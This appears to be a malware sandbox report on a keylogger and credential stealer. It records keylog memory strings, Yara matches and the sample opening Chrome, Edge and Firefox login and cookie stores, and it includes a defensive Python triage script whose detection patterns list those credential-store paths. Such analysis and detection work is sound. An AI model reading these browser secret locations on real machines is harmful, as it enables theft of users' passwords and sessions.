Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:19]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:08]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7:55:24]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891223171.000000000060F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:47]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:42]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:31]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:36]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:20]<<Program Manager>>
Source: KeyDataovGFJnlG.txt.0.dr Binary or memory string: [07:56:34]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:30]<<Program Manager>>
Source: KeyDatansgiHqmX.txt.0.dr Binary or memory string: [07:56:56]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:41]<<Program Manager>>
Source: KeyDataDqJdpmHo.txt.0.dr Binary or memory string: [07:56:45]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.0000000000616000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a5:46]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-1245:05]<<Program Manager>>
Source: KeyDataHhUnZmvD.txt.0.dr Binary or memory string: [07:56:23]<<Program Manager>>
Source: KeyDataZWdrgPWC.txt.0.dr Binary or memory string: [07:56:12]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:21]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1813034087.000000000346B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 07:55:24]<<Program Manager>>
Source: KeyDataOebbnOVW.txt.0.dr Binary or memory string: [07:56:00]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:35]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:43]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Z]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:26]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:55:31]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:04]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:09]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:34]<<Program Manager>>
Source: KeyDataDqJdpmHo.txt.0.dr Binary or memory string: [07:56:52]<<Program Manager>>
Source: KeyDatansgiHqmX.txt.0.dr Binary or memory string: [07:57:06]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891223171.000000000060F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:48]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerttureEM0
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 55:42]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ThunderRT6PictureBox:55:30]<<Program Manager>>
Source: KeyDataDqJdpmHo.txt.0.dr Binary or memory string: [07:56:44]<<Program Manager>>
Source: KeyDataHhUnZmvD.txt.0.dr Binary or memory string: [07:56:22]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 07:55:06]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:39]<<Program Manager>>
Source: KeyDataovGFJnlG.txt.0.dr Binary or memory string: [07:56:32]<<Program Manager>>
Source: KeyDataHhUnZmvD.txt.0.dr Binary or memory string: [07:56:21]<<Program Manager>>
Source: KeyDataZWdrgPWC.txt.0.dr Binary or memory string: [07:56:10]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ThunderRT6PictureBoxDCdnsapi.dll,-10355:25]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:27]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:38]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:05]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124:23]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:33]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:22]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ThunderRT6PictureBox[07:55:40]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:44]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:29]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.0000000000616000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.0000000000616000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r_:39]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:07]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:46]<<Program Manager>>
Source: KeyDataZWdrgPWC.txt.0.dr Binary or memory string: [07:56:11]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:32]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:24]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:48]<<Program Managerypeof a?a:void 0}
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:37]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:23]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:45]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:40]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 32]<<Program Manager>>
Source: KeyDataOebbnOVW.txt.0.dr Binary or memory string: [07:55:59]<<Program Manager>>
Source: KeyDataovGFJnlG.txt.0.dr Binary or memory string: [07:56:33]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:06]<<Program Manager>>
Source: KeyDatansgiHqmX.txt.0.dr Binary or memory string: [07:56:55]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:28]<<Program Manager>>

Stealing of Sensitive Information

barindex
Source: Yara match File source: MSM8C42iAN.exe, type: SAMPLE
Source: Yara match File source: 0.0.MSM8C42iAN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1332379073.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSM8C42iAN.exe PID: 2220, type: MEMORYSTR
Source: C:\Users\user\Desktop\MSM8C42iAN.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite Jump to behavior
Source: Yara match File source: Process Memory Space: MSM8C42iAN.exe PID: 2220, type: MEMORYSTR
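The keylogger strings recorded above in the form `[HH:MM:SS]<<Window Title>>` and the browser credential store opens listed in this section can both be turned into a small triage check. The Python below is an added example written for this page, not code from the sandbox or from the DarkCloud sample: it parses report-style "File opened:" lines, classifies the path against known browser credential and cookie stores, and parses keylog lines including the truncated one captured from memory. The event lines are constructed from the paths shown in the report; the Firefox `logins.json` pattern and the benign `kernel32.dll` negative case are assumptions added for completeness, and the path patterns assume a standard Windows profile layout.

```python
import re
from collections import Counter

# Browser credential/cookie stores opened by the sample in the report, generalised
# over user name and profile directory. The Firefox logins.json entry is an
# assumption (not observed in this report) added so the list covers saved logins
# for all three browsers.
CREDENTIAL_STORES = [
    (r"\\AppData\\Local\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$", "Chrome saved logins"),
    (r"\\AppData\\Local\\Google\\Chrome\\User Data\\[^\\]+\\Web Data$", "Chrome autofill/cards"),
    (r"\\AppData\\Local\\Microsoft\\Edge\\User Data\\[^\\]+\\Login Data$", "Edge saved logins"),
    (r"\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite$", "Firefox cookies"),
    (r"\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\[^\\]+\\logins\.json$", "Firefox saved logins"),
]
_COMPILED = [(re.compile(p, re.IGNORECASE), label) for p, label in CREDENTIAL_STORES]

# Report lines look like "File opened: <path> Jump to behavior"; the suffix is optional.
FILE_EVENT = re.compile(r"File opened:\s+(.+?)(?:\s+Jump to behavior)?$")

# Keylog format seen in memory and in the dropped KeyData*.txt files:
# "[07:55:37]<<Program Manager>>". The closing ">>" is optional so that strings
# cut off or overwritten in memory (as in the report) are still recovered.
KEYLOG_LINE = re.compile(r"^\[(\d{2}):(\d{2}):(\d{2})\]<<(.*?)(?:>>)?$")


def classify_path(path: str):
    """Return an artifact label if `path` is a known browser credential store, else None."""
    for pattern, label in _COMPILED:
        if pattern.search(path):
            return label
    return None


def scan_file_events(lines):
    """Parse report-style 'File opened:' lines and return [(path, label)] for credential stores."""
    hits = []
    for line in lines:
        m = FILE_EVENT.search(line.strip())
        if not m:
            continue
        path = m.group(1).strip()
        label = classify_path(path)
        if label:
            hits.append((path, label))
    return hits


def parse_keylog(lines):
    """Parse keylog lines into (time, window_title, complete) tuples.

    `complete` is False when the closing '>>' is missing, i.e. the string was
    truncated or partially overwritten when it was captured from memory.
    """
    entries = []
    for line in lines:
        line = line.strip()
        m = KEYLOG_LINE.match(line)
        if m:
            hh, mm, ss, title = m.groups()
            entries.append((f"{hh}:{mm}:{ss}", title, line.endswith(">>")))
    return entries


def summarize(file_lines, keylog_lines):
    """Aggregate both checks into a dict a triage script can act on."""
    hits = scan_file_events(file_lines)
    entries = parse_keylog(keylog_lines)
    return {
        "credential_stores": Counter(label for _, label in hits),
        "keylog_entries": len(entries),
        "truncated_keylog_entries": sum(1 for _, _, ok in entries if not ok),
    }


# Constructed sample input: the four credential store paths from the report plus
# one benign file (kernel32.dll, an assumption) that must not match.
SAMPLE_FILE_EVENTS = [
    r"File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior",
    r"File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior",
    r"File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior",
    r"File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite Jump to behavior",
    r"File opened: C:\Windows\System32\kernel32.dll Jump to behavior",
]

# Constructed keylog sample: two intact entries and the overlapping memory string from the report.
SAMPLE_KEYLOG = [
    "[07:55:48]<<Program Managerypeof a?a:void 0}",
    "[07:55:37]<<Program Manager>>",
    "[07:56:33]<<Program Manager>>",
    "not a keylog line",
]

if __name__ == "__main__":
    for path, label in scan_file_events(SAMPLE_FILE_EVENTS):
        print(f"{label:24s} {path}")
    for when, title, complete in parse_keylog(SAMPLE_KEYLOG):
        print(f"{when} {title!r} complete={complete}")
    print(summarize(SAMPLE_FILE_EVENTS, SAMPLE_KEYLOG))
```

The path patterns deliberately wildcard the profile directory (`Default`, `Profile 1`, `xxxxxxxx.default-release`) because a single-profile match would miss the same behaviour on a differently configured machine; the keylog parser keeps truncated entries but flags them so a triage script can weight them lower than intact ones.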

Remote Access Functionality

barindex
Source: Yara match File source: MSM8C42iAN.exe, type: SAMPLE
Source: Yara match File source: 0.0.MSM8C42iAN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1332379073.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSM8C42iAN.exe PID: 2220, type: MEMORYSTR